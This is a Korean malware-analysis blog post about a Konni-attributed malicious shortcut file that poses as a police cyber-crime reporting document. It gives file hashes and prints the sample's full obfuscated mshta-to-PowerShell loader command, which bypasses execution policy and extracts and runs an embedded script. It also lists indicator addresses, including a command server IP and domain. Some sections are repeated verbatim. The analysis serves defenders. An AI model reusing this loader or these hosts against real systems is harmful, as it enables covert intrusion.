북한 해킹 그룹 Konni(코니)에서 만든 사이버범죄 신고시스템 사칭 악성코드-ECRM.hwp.lnk(2025.3.11)
Contents
오늘은 북한 해킹 그룹 Konni(코니)에서 만든 악성코드 ECRM.M.hwp.lnk(2025.3.11) 에 대해 알아보겠습니다. 일단 ECRM.M.hwp.lnk 는 아마도 경찰청에서 운영을 하고 있는 사이버범죄 신고시스템(사이버 수사대) (ECRM)인 것처럼 위장하는 것 같습니다. 아마도 이쪽을 공격했거나 아니며 사이버범죄 신고시스템(사이버 수사대) (ECRM) 에서 뿌린 hwp인 것처럼 한 것인 것 같습니다.
파일명:ECRM.M.hwp.lnk
사이즈:1 MB
MD5:5bd8cad0e4f14e252056830d16abfbe5
SHA-1:61bae4c2061e3672eb1d416a2e894f8bd2165502
SHA-256:811d221a1340e64aa1736d9d4e8f80820a5a02fab3d0c9e454f3ed35cd717b81
악성코드에 포함된 코드
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\(S)ystem32\mshta(.)exe
workingdir: not present
commandlinearguments: javascript:p="$w ([byte[]]($f "(+)"| select -Skip 0x0beb)) -Force";k="c:\\pro"(+)"gramdata\\";b=" -Encodin(g) Byte;sc ";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,tr(u)e);close();";c="powe"+"rshell -ep bypass -c $t=0x1c4c;$k = Get-ChildI(t)em *.lnk | where(-)object {$_.length -eq $t} | Select-Object -ExpandProperty Na(m)e;if($k.count -eq 0){$(k)=Get-ChildItem $env:T"+"EMP\\*\\*.l"(+)"nk | where-object{$_.length -eq $t};};$w='"+k+"e.ps1';$f=gc $k"+b+p+b+k+"d3914 0;po"(+)"wersh"+"ell -ep bypass -f $w;";eval(s);
iconlocation: .hwp
}
악성코드 설명
윈도우 의 mshta.exe를 이용한 파일리스(fileless) 공격 기법
1.mshta.exe 활용
mshta.exe는 Microsoft HTML Application 실행 파일로 HTML 및 JavaScript/를 실행악용 이를 악용해서 악성 스크립트를 실행
mshta.exe 는 Windows 시스템 기본 프로그램이므로 보안 탐지를 우회 하기 위한 목적
상대 경로(..\..\..\Windows\System32\mshta.exe)를 사용하여 실행 위치를 유연하게 조정
2. JavaScript 코드 분석 (commandlinearguments)
코드의 핵심은 javascript:p=…. 이후부터
mshta.exe 를 이용하여 JavaScript 실행
JavaScript 내부에서 ActiveXObject('WScript.Shell')을 사용하여 PowerShell 실행
PowerShell을 통해 특정 크기의 …
파일명:ECRM.M.hwp.lnk
사이즈:1 MB
MD5:5bd8cad0e4f14e252056830d16abfbe5
SHA-1:61bae4c2061e3672eb1d416a2e894f8bd2165502
SHA-256:811d221a1340e64aa1736d9d4e8f80820a5a02fab3d0c9e454f3ed35cd717b81
악성코드에 포함된 코드
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\(S)ystem32\mshta(.)exe
workingdir: not present
commandlinearguments: javascript:p="$w ([byte[]]($f "(+)"| select -Skip 0x0beb)) -Force";k="c:\\pro"(+)"gramdata\\";b=" -Encodin(g) Byte;sc ";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,tr(u)e);close();";c="powe"+"rshell -ep bypass -c $t=0x1c4c;$k = Get-ChildI(t)em *.lnk | where(-)object {$_.length -eq $t} | Select-Object -ExpandProperty Na(m)e;if($k.count -eq 0){$(k)=Get-ChildItem $env:T"+"EMP\\*\\*.l"(+)"nk | where-object{$_.length -eq $t};};$w='"+k+"e.ps1';$f=gc $k"+b+p+b+k+"d3914 0;po"(+)"wersh"+"ell -ep bypass -f $w;";eval(s);
iconlocation: .hwp
}
악성코드 설명
윈도우 의 mshta.exe를 이용한 파일리스(fileless) 공격 기법
1.mshta.exe 활용
mshta.exe는 Microsoft HTML Application 실행 파일로 HTML 및 JavaScript/를 실행악용 이를 악용해서 악성 스크립트를 실행
mshta.exe 는 Windows 시스템 기본 프로그램이므로 보안 탐지를 우회 하기 위한 목적
상대 경로(..\..\..\Windows\System32\mshta.exe)를 사용하여 실행 위치를 유연하게 조정
2. JavaScript 코드 분석 (commandlinearguments)
코드의 핵심은 javascript:p=…. 이후부터
mshta.exe 를 이용하여 JavaScript 실행
JavaScript 내부에서 ActiveXObject('WScript.Shell')을 사용하여 PowerShell 실행
PowerShell을 통해 특정 크기의 …
IoC
http://64.20.59.148
http://snswf.dropwm.com/
http://서버64.20.59.148:8855
http://\programdata\ws.zip
64.20.59.148
5bd8cad0e4f14e252056830d16abfbe5
811d221a1340e64aa1736d9d4e8f80820a5a02fab3d0c9e454f3ed35cd717b81
61bae4c2061e3672eb1d416a2e894f8bd2165502
http://snswf.dropwm.com/
http://서버64.20.59.148:8855
http://\programdata\ws.zip
64.20.59.148
5bd8cad0e4f14e252056830d16abfbe5
811d221a1340e64aa1736d9d4e8f80820a5a02fab3d0c9e454f3ed35cd717b81
61bae4c2061e3672eb1d416a2e894f8bd2165502